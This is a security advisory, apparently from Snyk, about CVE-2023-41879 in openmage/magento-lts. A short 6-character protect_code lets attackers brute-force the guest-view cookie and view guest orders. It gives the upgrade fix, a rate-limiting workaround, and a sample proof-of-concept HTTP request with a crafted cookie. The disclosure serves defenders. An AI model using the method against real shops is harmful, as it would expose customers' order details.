Insecure Randomness Affecting openmage/magento-lts package, versions <19.5.1 >=20.0.0, <20.1.1
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-OPENMAGEMAGENTOLTS-5892784
- published 12 Sep 2023
- disclosed 11 Sep 2023
- credit Frank Rochlitzer
Introduced: 11 Sep 2023
CVE-2023-41879 Open this link in a new tabHow to fix?
Upgrade openmage/magento-lts to version 19.5.1, 20.1.1 or higher.
Overview
openmage/magento-lts is a This repository is the home of an unofficial community-driven project.
Affected versions of this package are vulnerable to Insecure Randomness due to using 6 hexadecimal characters protect_code which is insufficient to prevent a brute-force attack. As a result, guest orders may be viewed without authentication using a guest-view cookie which contains the order's protect_code.
Note:
Exposing each order would require a separate brute-force attack.
Workaround
Implementing rate-limiting at the web server would help mitigate the issue. In particular, a very strict rate limit (e.g. 1 per minute per IP) for the specific route (sales/guest/view/) would effectively mitigate the issue.
PoC
Request:
1 GET /magento19/index.php/default/sales/guest/view/ HTTP/1.1
2 Host: localhost.local
3 Cookie: guest-view=MzYyYzI4OjEwMDAwMDQzMQ%3D%3D;
4 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 Accept-Language: en-US,en;q=0.5
7 Accept-Encoding: gzip, deflate
8 Referer: https://localhost.local/magento19/index.php/default/egovs_checkout/multipage/successview/
9 Upgrade-Insecure-Requests: 1
10 Sec-Fetch-Dest: document
11 Sec-Fetch-Mode: navigate
12 Sec-Fetch-Site: same-origin
13 Sec-Fetch-User: ?1
14 Te: trailers
15 Connection: close